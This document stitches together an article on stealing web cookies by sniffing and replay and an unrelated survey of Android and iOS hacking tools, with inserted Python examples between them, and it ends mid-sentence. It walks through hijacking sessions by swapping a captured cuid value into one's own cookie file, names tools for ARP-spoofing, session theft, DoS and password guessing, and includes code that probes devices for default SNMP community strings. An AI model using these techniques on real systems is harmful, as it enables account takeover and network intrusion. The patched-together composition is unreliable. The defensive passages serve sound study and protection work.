An easy way to steal cookies


Have you ever wondered how some Web sites personalize pages for their visitors? It may show up as a “shopping cart” whose contents survive from page to page (if the site sells goods), or as form fields that are already filled in the way you filled them in last time. HTTP, the protocol underlying the World Wide Web, is stateless: it has no means of tracking events from one visit to a site to the next, so an add-on was developed to store such “state”. This mechanism, described in RFC 2109, inserts small pieces of data called cookies into HTTP requests and responses and allows Web sites to recognize their visitors.

Cookie data may live only for the duration of a browsing session (per-session cookies), remaining in memory and being discarded when the browser is closed, or it may be given an explicit expiry time. In other cases cookies are persistent, kept on the user's hard drive as text files. They are usually stored in the Cookies directory (%windir%\Cookies on Win9x and %userprofile%\Cookies on NT/2000). It is not hard to see that an attacker who captures cookies on the wire, or lifts them from the files on disk, can impersonate the user of that computer or harvest whatever sensitive information they contain. After reading the following sections, you will understand how easy this is to do.

Cookie interception

The most direct method is to intercept cookies as they are transmitted over the network. The captured data can then be presented when logging in to the server concerned. Any packet-capture utility will do, but one of the best is Laurentiu Nicula's SpyNet/PeepNet. SpyNet consists of two utilities that work together: CaptureNet captures the packets themselves and stores them on disk, and PeepNet opens the capture file and reconstructs it in human-readable form. The following example is a fragment of a session reconstructed by PeepNet, in which the cookie serves to authenticate the user and control access to the pages viewed (names have been changed to preserve anonymity).

GET http://www.victim.net/images/logo.gif HTTP/1.0
Accept: */*
Referer: http://www.victim.net/
Host: www.victim.net
Cookie: jrunsessionid=96114024278141622; cuid=TORPM!ZXTFRLRlpWTVFISEblahblah

The example shows the cookie carried in an HTTP request arriving at the server. The important field is cuid=, a unique identifier used to authenticate the user to www.victim.net. Suppose the attacker then visits victim.net and receives an identifier and a cookie of his own (assuming the site writes the cookie to disk rather than keeping it only in memory for the session). He can open his own cookie file and replace the value of the cuid= field with the one from the captured packet. When he next logs in to victim.net, the server will take him for the user whose cookie was intercepted. Note that nothing in this attack requires the user's password: the cookie alone is the credential, and it is sent in the clear on every request for the rest of the session.
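As an added illustration (not code from the original text), the following Python parses a captured request such as the one above, splits the Cookie header into its name/value pairs as RFC 2109 lays them out, and lists which of them look like session or identity tokens sent over plaintext HTTP. The sample request is the one above reassembled with CRLF line endings; the list of "session-looking" cookie names is a heuristic of this example, not something the text specifies.

```python
# Added example (not from the original text): parse a captured HTTP request
# like the one above and list the cookies it carries in the clear.

# Constructed sample: the request shown above, reassembled with CRLF line
# endings as a sniffer such as CaptureNet would record it.
CAPTURED_REQUEST = (
    "GET http://www.victim.net/images/logo.gif HTTP/1.0\r\n"
    "Accept: */*\r\n"
    "Referer: http://www.victim.net/\r\n"
    "Host: www.victim.net\r\n"
    "Cookie: jrunsessionid=96114024278141622; "
    "cuid=TORPM!ZXTFRLRlpWTVFISEblahblah\r\n"
    "\r\n"
)

# Heuristic: cookie names that usually carry a session or identity token.
# This list is an assumption of the example, not something the page specifies.
SESSION_NAME_HINTS = ("session", "sid", "uid", "auth", "token", "login")


def parse_request(raw):
    """Split a raw HTTP/1.x request into request line, headers and body.

    Header names are lower-cased; repeated headers are kept as a list.
    """
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line:
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed header line: {line!r}")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return {"method": method, "target": target, "version": version,
            "headers": headers, "body": body}


def cookie_pairs(cookie_header):
    """Parse a Cookie: header value into {name: value}.

    RFC 2109 sends NAME=VALUE pairs separated by ';'; attribute pairs
    such as $Version or $Path start with '$' and are not cookies.
    """
    pairs = {}
    for part in cookie_header.split(";"):
        part = part.strip()
        if not part or part.startswith("$"):
            continue
        name, _, value = part.partition("=")
        pairs[name.strip()] = value.strip()
    return pairs


def cleartext_session_cookies(raw):
    """Return the session-looking cookie names a plaintext request exposes."""
    req = parse_request(raw)
    exposed = []
    for header in req["headers"].get("cookie", []):
        for name in cookie_pairs(header):
            if any(hint in name.lower() for hint in SESSION_NAME_HINTS):
                exposed.append(name)
    return exposed


if __name__ == "__main__":
    for name in cleartext_session_cookies(CAPTURED_REQUEST):
        print(f"session cookie sent in the clear: {name}")
```

Run against the sample, both jrunsessionid and cuid are reported: either value, replayed in a Cookie header, is all the server asks for.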

PeepNet's ability to replay an entire session or part of it makes attacks of this type much easier. With the Go get it! button you can re-fetch the pages a user viewed, using the cookie data CaptureNet previously captured. In PeepNet's dialog box you can then see, for example, details of someone else's completed orders, obtained by presenting the intercepted cookie for authentication. Note the frame in the lower right corner of the session-data dialog and the line following Cookie:; that is the cookie data used for authentication.

It is a pretty neat trick. CaptureNet can also produce a complete decoded record of the traffic, which comes close to the capabilities of professional-grade tools such as Sniffer Pro from Network Associates, Inc. SpyNet has one further advantage: it is free.

Countermeasures

Be wary of sites that use cookies for authentication or for storing sensitive identifying information. One tool that helps is Kookaburra Software's Cookie Pal, available from http://www.kburra.com/cpal.html. It can be configured to warn the user whenever a Web site tries to set or read a cookie, so you can look behind the scenes and decide whether to allow it. Internet Explorer has built-in cookie controls: open the Internet Options applet in Control Panel, go to the Security tab, select the Internet zone, choose Custom Level, and set both persistent and per-session cookies to Prompt. In Netscape, use Edit › Preferences › Advanced and select Warn me before accepting a cookie or Disable cookies (Fig. 16.3). When you do accept a cookie, check whether it is written to disk and whether the site is collecting information about its users.

When visiting a site that uses cookies for authentication, make sure that at least the username and password you initially supply are sent over SSL; then they will not show up in PeepNet as plain text. Bear in mind that this protects only the login: if the site then drops back to plain HTTP, the cookie issued after login travels in the clear with every subsequent request and can be captured exactly as shown above, so the whole authenticated session needs to run over SSL for the countermeasure to be complete.

The authors would prefer to avoid cookies entirely, if so many frequently visited sites did not require them. For example, Microsoft's hugely popular Hotmail service requires cookies in order to log in. Because this service passes through several different servers during authentication, adding them all to the Trusted Sites zone is not straightforward (the process is described in the section "Using Security Zones Wisely: A Common Solution to the ActiveX Control Problem"); the pattern *.hotmail.com helps here. Cookies are not a perfect fix for the statelessness of HTTP, but the alternatives look even worse (for example, putting an identifier in the URL, where it ends up stored in proxy-server logs and caches). Until a better idea comes along, your only option is to keep your cookies under control with the methods listed above.

Capture cookies via URL

Now for something worse: Internet Explorer users who click on a specially crafted hyperlink risk having their cookies stolen. Bennett Haselton and Jamie McCarthy of Peacefire, a youth organization that campaigns for freedom of communication on the Internet, published a script that does exactly this. It retrieves cookies from the client computer when the user clicks a link on the page, and the contents of the cookies become available to the operator of the Web site.

The technique can be put to malicious use by embedding IFRAME tags in the HTML of a Web page, an HTML e-mail, or a newsgroup post. An example provided by security consultant Richard M. Smith demonstrated the use of IFRAME tags together with the Peacefire script.

To keep such things from threatening our personal data, I do this myself and advise everyone to do the same: keep every piece of software that handles HTML (e-mail clients, media players, browsers, and so on) up to date.

Many people prefer simply to block cookies, but most Web sites require them for normal browsing. The conclusion: if some new technology lets us do without cookies, programmers and administrators will breathe a sigh of relief, but for now cookies remain a tasty morsel for an attacker, because no better alternative yet exists.

Server-side countermeasures

For the server side, experts give one simple piece of advice: do not use cookies unless you really have to! Take particular care with cookies that remain on the user's system after the session ends.

That said, cookies are often exactly what a Web server uses to authenticate users. If your application does need cookies, issue a fresh, randomly generated, short-lived session identifier for each session, and never put anything in the cookie that an attacker could edit to his advantage (such as ADMIN=TRUE): keep the user's privileges and other state on the server, keyed by the session identifier.

You can also encrypt cookie contents so that sensitive information cannot be read out of them. Encryption does not solve every problem with cookies; in particular, it does nothing against the replay attack described above, since the attacker re-sends the captured value unchanged, so even encrypted cookies should be sent only over SSL (RFC 2109's Secure attribute tells the browser to do just that). But it does stop the most basic attack, reading the data straight out of the cookie file.
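As an added example (not code from the original text), here is what the server-side advice above looks like in Python: the weak pattern the text warns against beside a hardened one that issues a random, short-lived session identifier, protects it with an HMAC under a key that stays on the server, and keeps the ADMIN decision in a server-side table rather than in the cookie. Names such as issue_cookie, verify_cookie, login and authorize are this example's own; the Secure attribute is from RFC 2109, HttpOnly is a later browser extension.

```python
# Added example (not from the original text): a server-side session cookie
# that carries only a random identifier, signed with a server-held key, and
# an authorization check that keeps privileges on the server. Function and
# variable names are assumptions for illustration.
import base64
import binascii
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # never leaves the server
COOKIE_NAME = "sid"
SESSION_TTL = 3600                     # seconds; short-lived, as advised
SESSIONS = {}                          # session id -> server-side state


def weak_cookie(user, is_admin):
    """The pattern the text warns against: trusting state stored in the cookie."""
    return f"user={user}; ADMIN={'TRUE' if is_admin else 'FALSE'}"


def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_cookie(session_id, now, key=SERVER_KEY, ttl=SESSION_TTL):
    """Cookie value = base64(id|expiry) '.' base64(HMAC-SHA256 over that)."""
    payload = f"{session_id}|{now + ttl}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return f"{_b64(payload)}.{_b64(tag)}"


def verify_cookie(value, now, key=SERVER_KEY):
    """Return the session id if the tag is valid and unexpired, else None."""
    try:
        p64, t64 = value.split(".", 1)
        payload, tag = _unb64(p64), _unb64(t64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None                     # edited or forged
    session_id, _, expiry = payload.decode().rpartition("|")
    if now >= int(expiry):
        return None                     # stale; a captured cookie has a bounded life
    return session_id


def set_cookie_header(value, ttl=SESSION_TTL):
    """Secure (RFC 2109) keeps the browser from sending it over plain HTTP;
    HttpOnly (a later browser extension) keeps page scripts from reading it."""
    return (f"Set-Cookie: {COOKIE_NAME}={value}; Max-Age={ttl}; Path=/; "
            f"Secure; HttpOnly")


def login(user, is_admin, now):
    """After the password check: mint a fresh random id, keep the role server-side."""
    session_id = secrets.token_urlsafe(32)      # 256 bits from the OS CSPRNG
    SESSIONS[session_id] = {"user": user, "admin": is_admin}
    return issue_cookie(session_id, now)


def authorize(cookie_value, now):
    """Map a presented cookie back to server-side state, or None."""
    session_id = verify_cookie(cookie_value, now)
    if session_id is None:
        return None
    return SESSIONS.get(session_id)
```

A cookie edited to extend its expiry, or a value with any byte changed, fails the HMAC check; a captured cookie still works until it expires, which is why the short lifetime and the Secure attribute matter as much as the signature.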

“A smartphone with hacking tools? There's no such thing,” we would have told you not long ago. Until recently you could run some of the usual attack tools only on Maemo. Now many familiar tools have been ported to iOS and Android, and some hacking tools have been written specifically for the mobile environment. Can a smartphone replace a laptop in a penetration test? We decided to find out.

ANDROID

Android is a popular platform not only among ordinary mortals but also among the right sort of people. The number of useful ][-utilities here is simply off the charts, and for that we can thank the system's UNIX roots, which have made porting many tools to Android much easier. Unfortunately, Google does not allow some of them into the Play Store, so you will have to install the corresponding APK manually. Some utilities also need full access to the system (the iptables firewall, for example), so take care of root access in advance. Each manufacturer has its own way of doing this, but the necessary instructions are easy to find: a good set of HOWTOs was put together by LifeHacker (bit.ly/eWgDlu), and if your particular model is not covered there, the XDA-Developers forum (www.xda-developers.com) has information on practically any Android phone. That said, some of the utilities described below work without root.

Package Manager

BotBrew
Let's start the review with an unusual package manager. Its developers call it “utilities for superusers”, and that is not far from the truth. After installing BotBrew you get a repository from which you can download a huge number of familiar tools compiled for Android. Among them: Python and Ruby interpreters, for running the many tools written in those languages; the tcpdump sniffer and the Nmap scanner for network analysis; Git and Subversion for working with version-control systems; and much more.

Network scanners

PIPS
An inconspicuous smartphone that, unlike a laptop, fits easily into a pocket and never raises suspicion can be very useful for network reconnaissance. We have already mentioned how to install Nmap, but there is another option. PIPS is a port of the Nmap scanner adapted specifically for Android, albeit an unofficial one. With it you can quickly find active hosts on the network, determine their OS with the fingerprinting options, run a port scan: in short, do everything Nmap can do.

Fing
Using Nmap, for all its power, has two problems. First, scan parameters are passed as command-line options, which you not only have to know but also have to type on an awkward mobile keyboard. Second, the console output is not as clear as one would like. The Fing scanner has neither shortcoming: it scans the network very quickly, does fingerprinting, and then shows a clear list of all reachable devices, grouped by type (router, desktop, iPhone, and so on). For each host you can immediately see the list of open ports, and from there you can connect straight away, say, to FTP with the FTP client installed on the system, which is very convenient.

NetAudit
When it comes to analyzing a specific host, NetAudit can be indispensable. It works on any Android device (even without root) and lets you not only identify devices on the network quickly but also examine them against a large fingerprint database to determine the operating system and the CMS running on the web server. The database now holds more than 3,000 fingerprints.

Net Tools
If, on the other hand, you need to work at a lower level and look closely at how the network behaves, you cannot do without Net Tools. This is an essential set of utilities for a system administrator, allowing full diagnosis of the network the device is connected to. The package contains more than 15 different programs, such as ping, traceroute, arp, dns, netstat and route.

Traffic manipulation

Shark for Root
This tcpdump-based sniffer dutifully logs all data into a pcap file, which can then be studied with familiar tools such as Wireshark or NetworkMiner. Since it implements no MITM capabilities, it is more a tool for analyzing your own traffic. For example, it is a great way to find out what the programs you installed from dubious repositories are sending home.

FaceNiff
If we talk about combat applications for Android, one of the most notorious is FaceNiff, which intercepts and injects into captured web sessions. Download the APK and you can run this hacking tool on almost any Android smartphone; connect to a wireless network and it will intercept accounts for a variety of services: Facebook, Twitter, VKontakte and so on, more than ten in total. Session hijacking is done with an ARP spoofing attack, and it works only against unprotected connections (FaceNiff cannot get into SSL traffic). To curb the flood of script kiddies, the author limited the number of sessions to three; beyond that you have to ask the developer for an activation code.

DroidSheep
Where FaceNiff's author wants money for his tool, DroidSheep is a completely free tool with the same functionality. You will not find the package on the official website (a consequence of Germany's harsh laws on security utilities), but it is easy enough to find on the Internet. Its main purpose is to intercept users' web sessions on popular social networks, again by ARP spoofing. It has the same problem with secure connections: like FaceNiff, DroidSheep flatly refuses to work with HTTPS.

Network Spoofer
This utility also demonstrates the insecurity of open wireless networks, but at a slightly different level. It does not intercept user sessions; instead it routes HTTP traffic through itself by means of a spoofing attack and performs the manipulations you specify on it. These range from plain pranks (replacing every picture on a site with trollfaces, flipping images, or, say, replacing Google results) to phishing attacks, where the user is served fake pages for popular services such as facebook.com, linkedin.com, vkontakte.ru and many others.

Anti (Android Network Toolkit by zImperium LTD)
If you ask which hacking utility for Android is the most powerful, Anti probably has no competitors. It is a real hacker's combine harvester. Its main task is to scan the network perimeter; then various modules enter the fray, providing a whole arsenal: traffic eavesdropping, MITM attacks, and exploitation of the vulnerabilities found. There are drawbacks, though. The first thing you notice is that exploitation runs only from the program's central server on the Internet, so targets without an external IP address can be forgotten.

Traffic tunneling

Total Commander
The well-known file manager is now on smartphones! As in the desktop version, there is a plugin system for connecting to various network directories, as well as the canonical two-panel mode, which is especially convenient on tablets.

SSH Tunnel
Fine, but how do you secure your own data when it is sent over an open wireless network? Apart from VPN, which Android supports out of the box, you can create an SSH tunnel. For this there is the excellent SSH Tunnel utility, which routes the traffic of selected applications, or of the whole system, through a remote SSH server.

ProxyDroid
It is often necessary to send traffic through a proxy or SOCKS server, and here ProxyDroid helps out. It is simple: choose which applications' traffic you want to tunnel and specify the proxy (HTTP/HTTPS/SOCKS4/SOCKS5 are supported). If authentication is required, ProxyDroid supports that too. The configuration can also be tied to a particular wireless network, with different settings for each.

Wireless network

Wifi Analyzer
The built-in wireless network manager is not very informative. If you need a quick, complete picture of the access points nearby, Wifi Analyzer is an excellent choice. It shows not only all nearby access points but also the channel each operates on, its MAC address and, most importantly, the type of encryption in use (on seeing the coveted letters “WEP”, you can assume that access to the “protected” network is as good as yours). The utility is also ideal for finding where an access point is physically located, thanks to its visual signal-strength indicator.

WiFiKill
According to its developer, this utility is useful when a wireless network is packed with clients who are using up the whole channel, just when you need a fast, stable connection. WiFiKill lets you disconnect clients from the Internet either selectively or by a given criterion (for example, you can kick off all the Apple users). The program simply performs an ARP spoofing attack and redirects all the clients' traffic to itself, where it is dropped; the whole thing is implemented very simply on top of iptables. A remote control for the Wi-Fi in any fast-food joint :).
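FaceNiff, DroidSheep and WiFiKill all rest on the same trick, ARP spoofing: the attacker's MAC answers for the gateway (and usually for the victim too), so the LAN's traffic passes through the phone. As an added example that is not part of the original article, the Python below shows the defender's side: given the ARP replies seen on the segment, it flags addresses whose MAC changes and a single MAC claiming several IP addresses. The input format and the sample replies are constructed for this example.

```python
# Added example (not from the original article): detecting the ARP spoofing
# that FaceNiff, DroidSheep and WiFiKill rely on, from the ARP replies seen on
# the LAN. Input format and sample data are constructed for illustration.
from collections import defaultdict

# Constructed sample: (seconds, sender IP, sender MAC) from ARP replies.
# A gateway at .1 and a client at .20 exist; at t=2.0 a third MAC starts
# claiming both addresses, which is what a MITM between them looks like.
ARP_REPLIES = [
    (0.0, "192.168.1.1",  "00:11:22:33:44:01"),
    (0.5, "192.168.1.20", "00:11:22:33:44:20"),
    (1.0, "192.168.1.1",  "00:11:22:33:44:01"),
    (2.0, "192.168.1.1",  "AA:BB:CC:DD:EE:FF"),
    (2.1, "192.168.1.20", "AA:BB:CC:DD:EE:FF"),
    (3.0, "192.168.1.30", "00:11:22:33:44:30"),
]


def detect_arp_spoofing(replies, gateway_ip=None):
    """Return alerts for IPs whose MAC changes and MACs that claim several IPs.

    The first MAC seen for an address is taken as the legitimate one, so the
    monitor must be running before the attacker starts (or be seeded from a
    known-good table). Alerts for the gateway address are flagged specially,
    since the gateway is what every session-hijacking tool impersonates.
    """
    first_mac = {}
    ips_per_mac = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()
        ips_per_mac[mac].add(ip)
        known = first_mac.setdefault(ip, mac)
        if known != mac:
            alerts.append({"kind": "mac_changed", "ts": ts, "ip": ip,
                           "old": known, "new": mac,
                           "gateway": ip == gateway_ip})
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append({"kind": "one_mac_many_ips", "ts": None,
                           "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES, gateway_ip="192.168.1.1"):
        print(alert)
```

On a real host the replies would come from tcpdump -n arp (or from the pcap that Shark for Root writes). A static entry for the gateway (arp -s) blunts the attack on that host, and the reason both sniffers give up on HTTPS is that redirecting the traffic does not help when the session is protected end to end.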

Web application audit

HTTP Query Builder
Manipulating HTTP requests from a computer is a piece of cake: there are countless utilities and browser plugins for it. On a smartphone things are a little harder. HTTP Query Builder helps you send a custom HTTP request with the parameters you need, for example a chosen cookie or a modified User-Agent. The result of the request is displayed in the standard browser.

Router Brute Force ADS 2
If a site is protected with HTTP Basic authentication, you can test how strong that protection is with Router Brute Force ADS 2. The utility was originally written for guessing passwords on router admin panels, but obviously it can be used against any other resource with the same kind of protection. It works, but it is clearly rough: for example, there is no true brute force, only a dictionary attack.

AnDOSid
You have surely heard of Slowloris, the notorious program for taking web servers down. Its principle is to open and hold as many connections to the remote web server as possible, so that new clients can no longer connect. AnDOSid is a Slowloris analogue right on your Android device. I'll let you in on a secret: two hundred connections are enough to destabilize every fourth website running the Apache web server. And all this from your phone!

Various utilities

Encode
When working with web applications and analyzing their logic, you quite often meet data transmitted in encoded form, namely Base64. Encode helps you decode such data and see exactly what is stored in it. Perhaps, by inserting quotes, encoding the result back to Base64 and substituting it into the URL of the site you are examining, you will get the coveted database query error.

HexEditor
If you need a hex editor, there is one for Android too. With HexEditor you can edit any file, including system files if you grant the program superuser rights. It is also a fine replacement for the standard text editor, letting you find the piece of text you want and change it easily.

Remote access

ConnectBot
Once you have access to a remote host, you need to be able to use it, and for that you need clients. Let's start with SSH, where ConnectBot is already the de facto standard. Besides a convenient interface, it can set up secure tunnels over SSH connections.

PocketCloud Remote RDP/VNC
A useful program for connecting to a remote desktop over RDP or VNC. It is good to have both clients in one, with no need for separate tools for RDP and VNC.

SNMP MIB Browser
A MIB browser written specifically for Android, with which you can manage network devices over SNMP. It can be useful for developing an attack vector against various routers, because default community strings (in effect, the access password for SNMP management) are still very much in use.

iOS

The iOS platform is no less popular with security-tool developers. But whereas on Android root rights were needed only for some applications, on Apple devices a jailbreak is almost always required. Fortunately, even the latest iDevice firmware (5.1.1) already has a jailbreak. Along with full access you also get an alternative application manager, Cydia, which already carries many utilities.

Working with the system

MobileTerminal
The first thing to do is install a terminal. For obvious reasons it is not part of the standard mobile OS, but we need it to run the console utilities discussed below. The best terminal emulator is MobileTerminal: it supports multiple terminals and control gestures (for sending Control-C, for example) and is impressively well thought out.

iSSH
Another, more involved way to get at the device's console is to install OpenSSH on it (through Cydia) and connect to it locally with an SSH client. With the right client, such as iSSH with its excellent touch-screen controls, this is even more convenient than MobileTerminal.

Data interception

Pirni & Pirni Pro
Now that you have console access, you can try the utilities. Let's start with Pirni, which went down in history as the first full-fledged sniffer for iOS. Unfortunately, the Wi-Fi module built into the device cannot be switched into the promiscuous mode that normal capture requires, so classic ARP spoofing is used instead, passing all traffic through the device itself. The standard version is run from the console, where, besides the MITM attack parameters, you give the name of the PCAP file into which all traffic is logged. There is a more advanced version, Pirni Pro, with a graphical interface; it can also parse HTTP traffic on the fly and automatically extract interesting data (logins and passwords, for instance) using regular expressions set in its settings.

Intercepter-NG (console edition)
The well-known sniffer Intercepter-NG, which we have written about several times, recently gained a console version. As its author says, most of the code is written in pure ANSI C, which behaves the same in almost any environment, so the console version ran from the start on desktop Windows, Linux and BSD as well as on mobile platforms, including iOS and Android. The console version already grabs passwords sent over a variety of protocols, intercepts instant-messenger traffic (ICQ/Jabber and many others) and recovers files from traffic (HTTP/FTP/IMAP/POP3/SMTP/SMB). Network scanning and high-quality ARP poisoning are available as well. For it to work you must first install the libpcap package via Cydia (remember to enable developer packages in the settings). The startup instructions amount to setting the right permissions: chmod +x intercepter_ios. Run the sniffer with no parameters and a clear interactive Intercepter interface appears, from which any of the attacks can be launched.

Ettercap-NG
Hard to believe, but this sophisticated MITM tool has finally been ported to iOS. After a great deal of work a full-fledged mobile port was produced. To spare yourself the dependency dance of compiling it yourself, install a pre-built package through Cydia after adding theworm.altervista.org/cydia (the TWRepo repository) as a source. The kit also includes the etterlog utility, which extracts various kinds of useful information from the collected traffic dump (FTP credentials, for example).

Wireless network analysis

WiFi Analyzer
On older iOS versions enthusiasts ran aircrack and could break a WEP key, but we checked: it does not work on new devices. So for studying Wi-Fi we have to make do with scanners. WiFi Analyzer analyzes and displays information about all the 802.11 networks around you, including SSID, channel, vendor, MAC address and encryption type, and draws real-time graphs from what it sees on the air. With such a program it is easy to find the physical location of an access point if you have forgotten it, and, for example, to read its WPS PIN, which can be useful for connecting.

Network scanners

Scany
What program does any pentester anywhere in the world use, whatever the goals and objectives? A network scanner. On iOS that will most likely be Scany, the most powerful toolkit available. With its set of built-in utilities you can quickly get a detailed picture of the network's devices and, for example, their open ports. The package also includes network-testing utilities such as ping, traceroute and nslookup.

Fing
Many people prefer Fing, however. The scanner's functionality is simple and limited, but quite sufficient for a first look at, say, a cafe's network :). The results show the services available on remote machines, MAC addresses and the host names connected to the scanned network.

Nikto
It might seem that everyone has forgotten Nikto, but why? This web vulnerability scanner, written in a scripting language (Perl), can easily be installed via Cydia, which means you can just as easily run it on your jailbroken device from the terminal. Nikto will gladly give you extra information about the web resource under test, and you can add your own search signatures to its database by hand.

sqlmap
This powerful tool for automatically exploiting SQL injection is written in Python, so once you install the interpreter you can use it straight from your mobile device.

Remote control

SNMP Scan
Many network devices (including expensive routers) are managed over SNMP. This utility scans subnets for SNMP services that answer to well-known community strings (in other words, default passwords). Note that searching for SNMP services with default community strings (public/private) in an attempt to gain management access is a standard part of any penetration test, alongside mapping the perimeter and identifying services.

iTap mobile RDP / iTap mobile VNC
Two utilities from the same vendor for connecting to a remote desktop over RDP and VNC. There are many similar utilities in the App Store, but these are particularly easy to use.
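What a tool like SNMP Scan actually puts on the wire is small enough to build by hand. As an added example that is not part of the original article (and not SNMP Scan's own code), the Python below encodes an SNMPv1 GetRequest for sysDescr.0 with a chosen community string, decodes replies, and includes a probe that tries the default strings against a host. The BER encoder, the decoder and the function names are this example's own; the packet layout follows RFC 1157. Decoding the request back shows why "password" is the wrong word for a community string: it is a plaintext OCTET STRING that any sniffer on the segment reads directly.

```python
# Added example (not from the original article): what an SNMP scanner such as
# SNMP Scan actually sends. Builds an SNMPv1 GetRequest for sysDescr.0 with a
# given community string, decodes replies, and shows that the community string
# travels in the clear. Function names are assumptions for illustration.
import socket
import sys

SYS_DESCR_0 = "1.3.6.1.2.1.1.1.0"
DEFAULT_COMMUNITIES = ("public", "private")


def _ber_len(n):
    """BER length: short form below 128, long form (0x8N + N bytes) above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def _integer(v):
    """INTEGER, minimal two's-complement encoding."""
    body = v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True)
    return _tlv(0x02, body)


def _oid(dotted):
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128."""
    arcs = [int(a) for a in dotted.split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out.extend(reversed(chunk))
    return _tlv(0x06, bytes(out))


def snmpv1_get(community, oid=SYS_DESCR_0, request_id=1):
    """SNMPv1 Message { version 0, community, GetRequest-PDU [0] }."""
    varbind = _tlv(0x30, _oid(oid) + _tlv(0x05, b""))          # name, NULL
    pdu = _tlv(0xA0, _integer(request_id) + _integer(0) + _integer(0)
               + _tlv(0x30, varbind))
    return _tlv(0x30, _integer(0) + _tlv(0x04, community.encode()) + pdu)


def ber_decode(buf, pos=0):
    """Decode one TLV at pos; constructed tags (bit 0x20) recurse.

    Returns (tag, value, next_pos): bytes for primitives, a list of
    (tag, value) pairs for constructed types.
    """
    tag, pos = buf[pos], pos + 1
    length, pos = buf[pos], pos + 1
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    end = pos + length
    if tag & 0x20:
        items = []
        while pos < end:
            t, v, pos = ber_decode(buf, pos)
            items.append((t, v))
        return tag, items, end
    return tag, bytes(buf[pos:end]), end


def community_of(packet):
    """The community string is the plaintext OCTET STRING after the version."""
    _, items, _ = ber_decode(packet)
    return items[1][1].decode()


def is_get_response_ok(packet):
    """True if packet is a GetResponse-PDU [2] with error-status noError (0)."""
    _, items, _ = ber_decode(packet)
    pdu_tag, pdu = items[2]
    return pdu_tag == 0xA2 and pdu[1][1] == b"\x00"


def probe(host, communities=DEFAULT_COMMUNITIES, timeout=1.0):
    """Send one GetRequest per community string; return the first that the
    device answers. Sends real UDP/161 traffic; not used by the offline checks."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        for i, community in enumerate(communities, 1):
            s.sendto(snmpv1_get(community, request_id=i), (host, 161))
            try:
                data, _ = s.recvfrom(4096)
            except socket.timeout:
                continue                # v1 agents stay silent on a wrong community
            if is_get_response_ok(data):
                return community
    return None


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(probe(sys.argv[1]))
    else:
        print(snmpv1_get("public").hex())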

Password recovery

Hydra
The legendary program that helps millions of hackers around the world “remember” their passwords has been ported to iOS. You can now guess passwords for services such as HTTP, FTP, TELNET, SSH, SMB, VNC, SMTP, POP3 and many others straight from your iPhone. For a more effective attack, though, it is worth stocking up on good wordlists.

Pass Mule
Everyone knows first-hand how dangerous default passwords are. Pass Mule is a kind of directory containing all sorts of default logins and passwords for network devices, conveniently organized by vendor, product and model, so finding the one you need is not hard. The program is really meant to save the time spent hunting for a router's manual to find its default login and password.

Exploiting vulnerabilities

Metasploit
It is hard to imagine a more quintessential hacking tool than Metasploit, and it concludes today's review. Metasploit is a collection of tools whose main purpose is to exploit vulnerabilities in software. Imagine: about 1,000 reliable, proven exploits, the daily bread of a pentester, right on your smartphone! With such a tool you can really establish yourself in any network. Metasploit lets you exploit flaws not only in server applications; tools for attacking client applications are also available (for example, the Browser Autopwn module, which injects a live payload into client traffic). It must be said that there is no mobile version of the toolkit; however, you can install the standard package on an Apple device using .





